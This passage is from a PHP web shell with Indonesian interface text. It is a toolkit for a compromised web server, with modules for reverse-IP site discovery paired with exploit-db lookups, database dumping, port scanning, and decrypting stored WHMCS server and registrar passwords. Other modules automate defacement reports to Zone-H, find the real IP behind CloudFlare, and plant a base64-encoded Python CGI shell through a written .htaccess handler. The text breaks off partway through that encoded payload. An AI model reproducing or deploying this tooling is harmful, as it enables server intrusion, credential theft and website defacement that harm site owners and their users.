\'\r\n\r\n<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>\r\n<form method="POST">\r\n        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>\r\n</form><center>\r\n\r\n\';\r\n@set_time_limit(0);\r\n@error_reporting(E_ALL | E_NOTICE);\r\n \r\nfunction check_exploit($comxx){\r\n \r\n$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";\r\n \r\n$result = @file_get_contents($link);\r\n \r\nif (eregi("No results",$result))  {\r\n \r\necho"<td>Not Found</td><td><a href=\'http://www.google.com/#hl=en&q=download+$comxx+joomla+extension\'>Download</a></td></tr>";\r\n \r\n}else{\r\n \r\necho"<td><a href=\'$link\'>Found</a></td><td><=</td></tr>";\r\n \r\n}\r\n}\r\n \r\nfunction check_com($url){\r\n \r\n$source = @file_get_contents($url);\r\n \r\npreg_match_all(\'{option,(.*?)/}i\',$source,$f);\r\npreg_match_all(\'{option=(.*?)(&amp;|&|")}i\',$source,$f2);\r\npreg_match_all(\'{/components/(.*?)/}i\',$source,$f3);\r\n \r\n$arz=array_merge($f2[1],$f[1],$f3[1]);\r\n \r\n$coms=array();\r\n \r\nforeach(array_unique($arz) as $x){\r\n$coms[]=$x;\r\n}\r\n \r\nforeach($coms as $comm){\r\n \r\necho "<tr><td>$comm</td>";\r\ncheck_exploit($comm);\r\n}\r\n \r\n}\r\n \r\nfunction sec($site){\r\npreg_match_all(\'{http://(.*?)(/index.php)}siU\',$site, $sites);\r\nif(eregi("www",$sites[0][0])){\r\nreturn $site=str_replace("index.php","",$sites[0][0]);\r\n}else{\r\nreturn $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));\r\n}}\r\n \r\n$npages = 50000;\r\n \r\nif ($_POST)\r\n{\r\n  $ip = trim(strip_tags($_POST[\'site\']));\r\n  $npage = 1;\r\n  $allLinks = array();\r\n \r\n \r\n   while($npage <= $npages)\r\n  {\r\n \r\n  $x=@file_get_contents(\'http://www.bing.com/search?q=ip%3A\' . $ip . \'+index.php?option=com&first=\' . $npage);\r\n \r\n \r\n        if ($x)\r\n        {\r\n                preg_match_all(\'(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU\', $x, $findlink);\r\n              \r\n                foreach ($findlink[1] as $fl)\r\n              \r\n                $allLinks[]=sec($fl);\r\n              \r\n              \r\n                $npage = $npage + 10;\r\n              \r\n                if (preg_match(\'(first=\' . $npage . \'&amp)siU\', $x, $linksuiv) == 0)\r\n                        break;                    \r\n        }\r\n      \r\n    else\r\n                break;\r\n  }\r\n \r\n \r\n$allDmns = array();\r\n \r\nforeach ($allLinks as $kk => $vv){\r\n \r\n$allDmns[] = $vv;\r\n}\r\n                      \r\necho\'<table border="1"  width=\\"80%\\" align=\\"center\\">\r\n<tr><td width=\\"30%\\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>\'.$ip.\'</b></td></tr>                    \r\n<tr><td width=\\"30%\\"><b>Sites Found&nbsp; : </b></td><td><b>\'.count(array_unique($allDmns)).\'</b></td></tr>\r\n</table>\';\r\necho "<br><br>";\r\n \r\necho\'<table border="1" width="80%" align=\\"center\\">\';\r\n \r\nforeach(array_unique($allDmns) as $h3h3){\r\n \r\necho\'<tr id=new><td><b><a href=\'.$h3h3.\'>\'.$h3h3.\'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>\';\r\n \r\ncheck_com($h3h3);\r\n \r\n}\r\n \r\necho"</table>";\r\n \r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dump\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">\r\n    <?php\r\necho $head.\'<p align="center">\';\r\necho \'\r\n<table width=371 class=tabnet >\r\n<tr><th colspan="2">Database Dump</th></tr>\r\n<tr>\r\n\t<td>Server </td>\r\n\t<td><input class="inputz" type=text name=server size=52></td></tr><tr>\r\n\t<td>Username</td>\r\n\t<td><input class="inputz" type=text name=username size=52></td></tr><tr>\r\n\t<td>Password</td>\r\n\t<td><input class="inputz" type=text name=password size=52></td></tr><tr>\r\n\t<td>DataBase Name</td>\r\n\t<td><input class="inputz" type=text name=dbname size=52></td></tr>\r\n\t<tr>\r\n\t<td>DB Type </td>\r\n\t<td><form method=post action="\'.$me.\'">\r\n\t<select class="inputz" name=method>\r\n\t\t<option  value="gzip">Gzip</option>\r\n\t\t<option value="sql">Sql</option>\r\n\t\t</select>\r\n\t<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>\r\n\t</form></center></table>\';\r\nif ($_POST[\'username\'] && $_POST[\'dbname\'] && $_POST[\'method\']){\r\n$date = date("Y-m-d");\r\n$dbserver = $_POST[\'server\'];\r\n$dbuser = $_POST[\'username\'];\r\n$dbpass = $_POST[\'password\'];\r\n$dbname = $_POST[\'dbname\'];\r\n$file = "Dump-$dbname-$date";\r\n$method = $_POST[\'method\'];\r\nif ($method==\'sql\'){\r\n$file="Dump-$dbname-$date.sql";\r\n$fp=fopen($file,"w");\r\n}else{\r\n$file="Dump-$dbname-$date.sql.gz";\r\n$fp = gzopen($file,"w");\r\n}\r\nfunction write($data) {\r\nglobal $fp;\r\nif ($_POST[\'method\']==\'ssql\'){\r\nfwrite($fp,$data);\r\n}else{\r\ngzwrite($fp, $data);\r\n}}\r\nmysql_connect ($dbserver, $dbuser, $dbpass);\r\nmysql_select_db($dbname);\r\n$tables = mysql_query ("SHOW TABLES");\r\nwhile ($i = mysql_fetch_array($tables)) {\r\n    $i = $i[\'Tables_in_\'.$dbname];\r\n    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));\r\n    write($create[\'Create Table\'].";\\n\\n");\r\n    $sql = mysql_query ("SELECT * FROM ".$i);\r\n    if (mysql_num_rows($sql)) {\r\n        while ($row = mysql_fetch_row($sql)) {\r\n            foreach ($row as $j => $k) {\r\n                $row[$j] = "\'".mysql_escape_string($k)."\'";\r\n            }\r\n            write("INSERT INTO $i VALUES(".implode(",", $row).");\\n");\r\n        }\r\n    }\r\n}\r\nif ($method==\'ssql\'){\r\nfclose ($fp);\r\n}else{\r\ngzclose($fp);}\r\nheader("Content-Disposition: attachment; filename=" . $file);   \r\nheader("Content-Type: application/download");\r\nheader("Content-Length: " . filesize($file));\r\nflush();\r\n\r\n$fp = fopen($file, "r");\r\nwhile (!feof($fp))\r\n{\r\n    echo fread($fp, 65536);\r\n    flush();\r\n} \r\nfclose($fp); \r\n}\r\n\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'port-sc\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">\r\n    <?php\r\n    echo \'<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>\';\r\n    $start = strip_tags($_POST[\'start\']);\r\n    $end = strip_tags($_POST[\'end\']);\r\n    $host = strip_tags($_POST[\'host\']);\r\n    if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){\r\n    for($i = $start; $i<=$end; $i++){\r\n    $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n    if($fp){\r\n    echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n    }\r\n    flush();\r\n    }\r\n    }else{\r\n    echo \'<table class=tabnet style="width:300px;padding:0 1px;">\r\n   <input type="hidden" name="y" value="phptools">\r\n   <tr><th colspan="5">Port Scanner</th></center></tr>\r\n   <tr>\r\n\t\t<td>Host</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>\r\n   </tr>\r\n   <tr>\r\n\t\t<td>Port start</td>\r\n\t\t<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>\r\n   </tr>\r\n\t<tr><td>Port end</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>\r\n   </tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />\r\n   </td></form></center></table>\';\r\n    }\r\n}\r\n/////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hash\'))\r\n    {\r\n$submit= $_POST[\'enter\'];\r\nif (isset($submit)) {\r\n$pass = $_POST[\'password\']; // password\r\n$salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n$hash = md5($pass); // md5 hash #1\r\n$md4 = hash("md4",$pass);\r\n$hash_md5 = md5($salt.$pass); // md5 hash with salt #2\r\n$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3\r\n$hash1 = sha1($pass); // sha1 hash #4\r\n$sha256 = hash("sha256",$text);\r\n$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5\r\n$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6\r\n}\r\necho \'<form action="" method="post"><b><table class=tabnet>\';\r\necho \'<tr><th colspan="2">Password Hash</th></center></tr>\';\r\necho \'<tr><td><b>masukan kata yang ingin di encrypt:</b></td>\';\r\necho \'<td><input class="inputz" type="text" name="password" size="40" />\';\r\necho \'<input class="inputzbut" type="submit" name="enter" value="hash" />\';\r\necho \'</td></tr><br>\';\r\necho \'<tr><th colspan="2">Hasil Hash</th></center></tr>\';\r\necho \'<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=\'.$pass.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5</td><td><input class=inputz type=text size=50 value=\'.$hash.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD4</td><td><input class=inputz type=text size=50 value=\'.$md4.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash_md5.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash_md5_double.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=\'.$sha256.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1_double.\'></td></tr><br><br></table>\'; \r\n}\r\n\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whmcs\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">\r\n\r\n<?php\r\n\r\nfunction decrypt ($string,$cc_encryption_hash)\r\n{\r\n    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n    $hash_key = _hash ($key);\r\n    $hash_length = strlen ($hash_key);\r\n    $string = base64_decode ($string);\r\n    $tmp_iv = substr ($string, 0, $hash_length);\r\n    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n    $iv = $out = \'\';\r\n    $c = 0;\r\n    while ($c < $hash_length)\r\n    {\r\n        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n        ++$c;\r\n    }\r\n    $key = $iv;\r\n    $c = 0;\r\n    while ($c < strlen ($string))\r\n    {\r\n        if (($c != 0 AND $c % $hash_length == 0))\r\n        {\r\n            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n        }\r\n        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n        ++$c;\r\n    }\r\n    return $out;\r\n}\r\n\r\nfunction _hash ($string)\r\n{\r\n    if (function_exists (\'sha1\'))\r\n    {\r\n        $hash = sha1 ($string);\r\n    }\r\n    else\r\n    {\r\n        $hash = md5 ($string);\r\n    }\r\n    $out = \'\';\r\n    $c = 0;\r\n    while ($c < strlen ($hash))\r\n    {\r\n        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n        $c += 2;\r\n    }\r\n    return $out;\r\n}\r\n\r\necho "\r\n<br><center><font size=\'5\' color=\'#00ff00\'><b>-=[ WHMCS Decoder ]=-</b></font></center>\r\n<center>\r\n<br>\r\n\r\n<FORM action=\'\'  method=\'post\'>\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>\r\n<br>\r\n<table class=tabnet style=width:320px;padding:0 1px;>\r\n<tr><th colspan=2>WHMCS Decoder</th></tr> \r\n<tr><td>db_host </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_host\' value=\'localhost\'></td></tr>\r\n<tr><td>db_username </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_username\' value=\'\'></td></tr>\r\n<tr><td>db_password</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_password\' value=\'\'></td></tr>\r\n<tr><td>db_name</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_name\' value=\'\'></td></tr>\r\n<tr><td>cc_encryption_hash</td><td><input style=\'color:#00ff00;background-color:\' type=\'text\' class=\'inputz\' size=\'38\' name=\'cc_encryption_hash\' value=\'\'></td></tr>\r\n<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class=\'inputzbut\' type=\'submit\' style=\'color:#00ff00;background-color:\'  value=\'Submit\' name=\'Submit\'></td>\r\n</table>\r\n</FORM>\r\n</center>\r\n";\r\n\r\n if($_POST[\'form_action\'] == 2 )\r\n {\r\n //include($file);\r\n $db_host=($_POST[\'db_host\']);\r\n $db_username=($_POST[\'db_username\']);\r\n $db_password=($_POST[\'db_password\']);\r\n $db_name=($_POST[\'db_name\']);\r\n $cc_encryption_hash=($_POST[\'cc_encryption_hash\']);\r\n\r\n\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblservers");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>Type</td><td>$type</td></tr>");\r\necho("<tr><td>Active</td><td>$active</td></tr>");\r\necho("<tr><td>Hostname</td><td>$hostname</td></tr>");\r\necho("<tr><td>Ip</td><td>$ipaddress</td></tr>");\r\necho("<tr><td>Username</td><td>$username</td></tr>");\r\necho("<tr><td>Password</td><td>$password</td></tr>");\r\n\r\necho "</table><br><br></center>";\r\n}\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblregistrars");\r\necho("<center>Domain Reseller <br><table class=tabnet border=\'1\'>");\r\necho("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$registrar     = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt ($v[\'value\'], $cc_encryption_hash);\r\nif ($value=="") {\r\n$value=0;\r\n}\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");\r\n}\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'zone\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">\r\n\r\n<br><br><center>\r\n<!-- Zone-H -->\r\n<form action="" method=\'POST\'><table><table class=\'tabnet\'><tr>\r\n<td style=\'background-color:#0000;padding-left:10px;\'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height=\'45\' colspan=\'2\'><form method="post">\r\n<input type="text" class="inputz" name="defacer" value="Nama Defacer" />\r\n<select name="hackmode" class="inputz" >\r\n<option >------------------------Pilih Salah Satu------------------------</option>\r\n<option value="1">known vulnerability (i.e. unpatched system)</option>\r\n<option value="2" >undisclosed (new) vulnerability</option>\r\n<option value="3" >configuration / admin. mistake</option>\r\n<option value="4" >brute force attack</option>\r\n<option value="5" >social engineering</option>\r\n<option value="6" >Web Server intrusion</option>\r\n<option value="7" >Web Server external module intrusion</option>\r\n<option value="8" >Mail Server intrusion</option>\r\n<option value="9" >FTP Server intrusion</option>\r\n<option value="10" >SSH Server intrusion</option>\r\n<option value="11" >Telnet Server intrusion</option>\r\n<option value="12" >RPC Server intrusion</option>\r\n<option value="13" >Shares misconfiguration</option>\r\n<option value="14" >Other Server intrusion</option>\r\n<option value="15" >SQL Injection</option>\r\n<option value="16" >URL Poisoning</option>\r\n<option value="17" >File Inclusion</option>\r\n<option value="18" >Other Web Application bug</option>\r\n<option value="19" >Remote administrative panel access bruteforcing</option>\r\n<option value="20" >Remote administrative panel access password guessing</option>\r\n<option value="21" >Remote administrative panel access social engineering</option>\r\n<option value="22" >Attack against administrator(password stealing/sniffing)</option>\r\n<option value="23" >Access credentials through Man In the Middle attack</option>\r\n<option value="24" >Remote service password guessing</option>\r\n<option value="25" >Remote service password bruteforce</option>\r\n<option value="26" >Rerouting after attacking the Firewall</option>\r\n<option value="27" >Rerouting after attacking the Router</option>\r\n<option value="28" >DNS attack through social engineering</option>\r\n<option value="29" >DNS attack through cache poisoning</option>\r\n<option value="30" >Not available</option>\r\n</select>\r\n\r\n<select name="reason" class="inputz" >\r\n<option >-------------Pilih Salah Satu---------------</option>\r\n<option value="1" >Heh...just for fun!</option>\r\n<option value="2" >Revenge against that website</option>\r\n<option value="3" >Political reasons</option>\r\n<option value="4" >As a challenge</option>\r\n<option value="5" >I just want to be the best defacer</option>\r\n<option value="6" >Patriotism</option>\r\n<option value="7" >Not available</option>\r\n</select>\r\n<input type="hidden" name="action" value="zone">\r\n<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>\r\n<br /><input class=\'inputzbut\' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>\r\n</form></td></tr></table></form>\r\n<!-- End Of Zone-H -->\r\n</td></center><br><br>\r\n\r\n<?php\r\necho \'<center>\';\r\n\tob_start();\r\n\t$sub = get_loaded_extensions();\r\n\tif(!in_array("curl", $sub)){die(\'[-] Curl Is Not Supported !! \');}\r\n\t$hacker = $_POST[\'defacer\'];\r\n\t$method = $_POST[\'hackmode\'];\r\n\t$neden = $_POST[\'reason\'];\r\n\t$site = $_POST[\'domain\'];\r\n\t\r\n\tif (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}\r\n\telseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}\r\n\telseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}\r\n\telseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}\r\n\t$i = 0;\r\n\t$sites = explode("\\n", $site);\r\n\twhile($i < count($sites)) \r\n\t{\r\n\t\tif(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}\r\n\t\tZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);\r\n\t\techo "Site : ".$sites[$i]." Defaced !\\n";\r\n\t\t++$i;\r\n\t}\r\n\techo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";\r\n\r\n\techo \'</center>\';\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass-cf\'))\r\n{\t\r\necho \'\r\n<form method="POST"><br><br>\r\n<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass\r\n<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>\r\n<select class="inputz" name="krz">\r\n\t<option>ftp</option>\r\n\t\t<option>direct-conntect</option>\r\n\t\t\t<option>webmail</option>\r\n\t\t\t\t<option>cpanel</option>\r\n</select>\r\n<input class="inputz" type="text" name="target" value="url">\r\n<input class="inputzbut" type="submit" value="Bypass"></center>\r\n\r\n\';\r\n\r\n$target = $_POST[\'target\'];\r\n# Bypass From FTP\r\nif($_POST[\'krz\'] == "ftp") {\r\n$ftp = gethostbyname("ftp."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$ftp</font></p>";\r\n} \r\n# Bypass From Direct-Connect\r\nif($_POST[\'krz\'] == "direct-conntect") {\r\n$direct = gethostbyname("direct-connect."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$direct</font></p>";\r\n}\r\n# Bypass From Webmail\r\nif($_POST[\'krz\'] == "webmail") {\r\n$web = gethostbyname("webmail."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$web</font></p>";\r\n}\r\n# Bypass From Cpanel\r\nif($_POST[\'krz\'] == "cpanel") {\r\n$cpanel = gethostbyname("cpanel."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$cpanel</font></p>";\r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hashid\')) {\r\nif(isset($_POST[\'gethash\'])){\r\n\t\t$hash = $_POST[\'hash\'];\r\n\t\tif(strlen($hash)==32){\r\n\t\t\t$hashresult = "MD5 Hash";\r\n\t\t}elseif(strlen($hash)==40){\r\n\t\t\t$hashresult = "SHA-1 Hash/ /MySQL5 Hash";\r\n\t\t}elseif(strlen($hash)==13){\r\n\t\t\t$hashresult = "DES(Unix) Hash";\r\n\t\t}elseif(strlen($hash)==16){\r\n\t\t\t$hashresult = "MySQL Hash / /DES(Oracle Hash)";\r\n\t\t}elseif(strlen($hash)==41){\r\n\t\t\t$GetHashChar = substr($hash, 40);\r\n\t\t\tif($GetHashChar == "*"){\r\n\t\t\t\t$hashresult = "MySQL5 Hash"; \r\n\t\t\t}\t\r\n\t\t}elseif(strlen($hash)==64){\r\n\t\t\t$hashresult = "SHA-256 Hash";\r\n\t\t}elseif(strlen($hash)==96){\r\n\t\t\t$hashresult = "SHA-384 Hash";\r\n\t\t}elseif(strlen($hash)==128){\r\n\t\t\t$hashresult = "SHA-512 Hash";\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$1$\')){\r\n\t\t\t\t$hashresult = "MD5(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==37){\r\n\t\t\tif(strstr($hash, \'$apr1$\')){\r\n\t\t\t\t$hashresult = "MD5(APR) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$H$\')){\r\n\t\t\t\t$hashresult = "MD5(phpBB3) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$P$\')){\r\n\t\t\t\t$hashresult = "MD5(Wordpress) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$5$\')){\r\n\t\t\t\t$hashresult = "SHA-256(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$6$\')){\r\n\t\t\t\t$hashresult = "SHA-512(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==24){\r\n\t\t\tif(strstr($hash, \'==\')){\r\n\t\t\t\t$hashresult = "MD5(Base-64) Hash";\r\n\t\t\t} \t\r\n\t\t}else{\r\n\t\t\t$hashresult = "Hash type not found";\r\n\t\t}\r\n\t}else{\r\n\t\t$hashresult = "Not Hash Entered";\r\n\t}\r\n\t\r\n\t?>\r\n\t<center><br><Br><br>\r\n\t\r\n\t\t<form action="" method="POST">\r\n\t\t<tr>\r\n\t\t<table class="tabnet">\r\n\t\t<th colspan="5">Hash Identification</th>\r\n\t\t<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>\t<td><input type="text" name="hash" size=\'60\' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>\r\n\t\t<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>\r\n\t</table></tr></form>\r\n\t</center>\r\n\t\r\n\t<?php\r\n }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'python\')) { \r\necho "<center/><br/><b>\r\n +--==[ python  Bypass Exploit ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'python\', 0755);\r\n    chdir(\'python\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24